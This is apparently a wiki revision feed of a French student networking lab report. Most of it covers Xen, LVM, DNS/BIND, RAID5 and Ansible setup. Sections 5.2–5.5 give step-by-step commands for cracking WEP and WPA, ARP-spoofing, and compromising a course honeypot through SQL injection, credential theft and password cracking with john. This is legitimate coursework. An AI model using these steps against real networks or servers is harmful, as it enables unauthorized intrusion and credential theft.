 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous configurons d'abord nos paramètres DNS dans gandi avant de confgurer la VM. &lt;br /&gt;
&lt;br /&gt;
Dans Glue Records nous ajoutons le namespace et son IP : ns1.stropharia.site / 193.48.57.178&lt;br /&gt;
Dans Name Server nous ajoutons ce DNS et le secondaire :&lt;br /&gt;
ns1.stropharia.site | ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser l'implémentation open-source de DNS bind pour créer une association entre notre nom de domaine et l'IP de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Et les différentes record types sont :&lt;br /&gt;
* A (Host address)&lt;br /&gt;
* AAAA (IPv6 host address)&lt;br /&gt;
* ALIAS (Auto resolved alias)&lt;br /&gt;
* CNAME (Canonical name for an alias)&lt;br /&gt;
* MX (Mail eXchange)&lt;br /&gt;
* NS (Name Server)&lt;br /&gt;
* PTR (Pointer)&lt;br /&gt;
* SOA (Start Of Authority)&lt;br /&gt;
* SRV (location of service)&lt;br /&gt;
* TXT (Descriptive text)&lt;br /&gt;
&lt;br /&gt;
On ajoute maintenant la zone dans le fichier /etc/bind/named.conf.local :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;stropharia.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.stropharia.site.signed&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
(On utilise le fichier signé pour sécuriser l'accès https, fait par la suite)&lt;br /&gt;
&lt;br /&gt;
On modifie également le fichier named.conf.options :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
         dnssec-enable yes;&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Afin d'autoriser le transfert des informations au DNS secondaire 217.70.177.40.&lt;br /&gt;
&lt;br /&gt;
On test alors la configuration :&lt;br /&gt;
 # host -t any stropharia.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases:&lt;br /&gt;
 stropharia.site mail is handled by 42 &lt;br /&gt;
 ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns6.gandi.net.&lt;br /&gt;
 stropharia.site has SOA record ns1.stropharia.site. &lt;br /&gt;
 root.stropharia.site. 13 3600 600 86400 600&lt;br /&gt;
&lt;br /&gt;
On conclue que le DNS est fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
=4.3  Sécurisation de site web par certificat=&lt;br /&gt;
&lt;br /&gt;
Blabla&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55155</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55155"/>
				<updated>2020-12-21T23:38:56Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* 4.2 Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous configurons d'abord nos paramètres DNS dans gandi avant de confgurer la VM. &lt;br /&gt;
&lt;br /&gt;
Dans Glue Records nous ajoutons le namespace et son IP : ns1.stropharia.site / 193.48.57.178&lt;br /&gt;
Dans Name Server nous ajoutons ce DNS et le secondaire :&lt;br /&gt;
ns1.stropharia.site | ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser l'implémentation open-source de DNS bind pour créer une association entre notre nom de domaine et l'IP de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Et les différentes record types sont :&lt;br /&gt;
* A (Host address)&lt;br /&gt;
* AAAA (IPv6 host address)&lt;br /&gt;
* ALIAS (Auto resolved alias)&lt;br /&gt;
* CNAME (Canonical name for an alias)&lt;br /&gt;
* MX (Mail eXchange)&lt;br /&gt;
* NS (Name Server)&lt;br /&gt;
* PTR (Pointer)&lt;br /&gt;
* SOA (Start Of Authority)&lt;br /&gt;
* SRV (location of service)&lt;br /&gt;
* TXT (Descriptive text)&lt;br /&gt;
&lt;br /&gt;
On ajoute maintenant la zone dans le fichier /etc/bind/named.conf.local :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;stropharia.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.stropharia.site.signed&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
(On utilise le fichier signé pour sécuriser l'accès https, fait par la suite)&lt;br /&gt;
&lt;br /&gt;
On modifie également le fichier named.conf.options :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
         dnssec-enable yes;&lt;br /&gt;
 };&lt;br /&gt;
